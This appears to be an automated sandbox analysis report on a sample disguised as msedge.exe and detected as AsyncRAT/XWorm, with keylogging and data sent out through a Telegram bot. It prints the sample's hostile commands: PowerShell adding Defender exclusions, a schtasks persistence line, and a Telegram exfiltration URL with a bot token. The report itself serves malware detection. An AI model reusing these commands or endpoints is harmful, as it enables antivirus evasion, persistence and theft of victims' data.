                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownTCP traffic detected without corresponding DNS query: 213.219.149.161
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /raw/RPPi3ByL HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: powershell.exe, 00000005.00000002.2319654280.0000016F7D6B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 0000000D.00000002.2697571611.00000215ECDC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mB
                    Source: powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 0000000D.00000002.2693896616.00000215ECD14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://micrLISTt.couS
                    Source: powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000005.00000002.2319002787.0000016F7D66C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.2209890780.0000020A21CDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 0000000D.00000002.2691169117.00000215ECAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: msedge.exe, msedge.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                    Source: msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=52790
                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                    Source: msedge.exe, 00000015.00000002.3313838372.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/RPPi3ByL
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49721 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: msedge.exe, XLogger.cs.Net Code: KeyboardLayout
                    Source: msedge.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\msedge.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: msedge.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD346881760_2_00007FFD34688176
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD346812D90_2_00007FFD346812D9
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD34688F220_2_00007FFD34688F22
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD3468D7C80_2_00007FFD3468D7C8
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD3468C0590_2_00007FFD3468C059
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD3468C0590_2_00007FFD3468C059
                    Source: C:\Users\user\Desktop\msedge.exeCode function: 0_2_00007FFD34681D490_2_00007FFD34681D49
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34668E4C2_2_00007FFD34668E4C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3466B9FA2_2_00007FFD3466B9FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34668EA02_2_00007FFD34668EA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34665BFA2_2_00007FFD34665BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347339D12_2_00007FFD347339D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347373422_2_00007FFD34737342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3465B9FA5_2_00007FFD3465B9FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34655EFA5_2_00007FFD34655EFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD346556EA5_2_00007FFD346556EA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34655BFA5_2_00007FFD34655BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34656FFA5_2_00007FFD34656FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347239D15_2_00007FFD347239D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347273425_2_00007FFD34727342
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34722E115_2_00007FFD34722E11
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34675EFA10_2_00007FFD34675EFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34675BFA10_2_00007FFD34675BFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34676FFA10_2_00007FFD34676FFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3474734210_2_00007FFD34747342
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 18_2_00007FFD346912D918_2_00007FFD346912D9
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 18_2_00007FFD34691D4918_2_00007FFD34691D49
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 19_2_00007FFD346812D919_2_00007FFD346812D9
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 19_2_00007FFD34681D4919_2_00007FFD34681D49
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 20_2_00007FFD346912D920_2_00007FFD346912D9
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 20_2_00007FFD34691D4920_2_00007FFD34691D49
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 21_2_00007FFD346712D921_2_00007FFD346712D9
                    Source: C:\Users\user\AppData\Local\msedge.exeCode function: 21_2_00007FFD34671D4921_2_00007FFD34671D49
                    Source: msedge.exe, 00000000.00000002.3356950165.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs msedge.exe
                    Source: msedge.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: msedge.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: msedge.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                    Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: msedge.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: msedge.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/21@2/3
                    Source: C:\Users\user\Desktop\msedge.exeFile created: C:\Users\user\AppData\Local\msedge.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\msedge.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\OnCH8EVI1tYADuXo
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3392:120:WilError_03
                    Source: C:\Users\user\Desktop\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: msedge.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: msedge.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\msedge.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: msedge.exeVirustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\msedge.exeFile read: C:\Users\user\Desktop\msedge.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\msedge.exe "C:\Users\user\Desktop\msedge.exe"
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\msedge.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
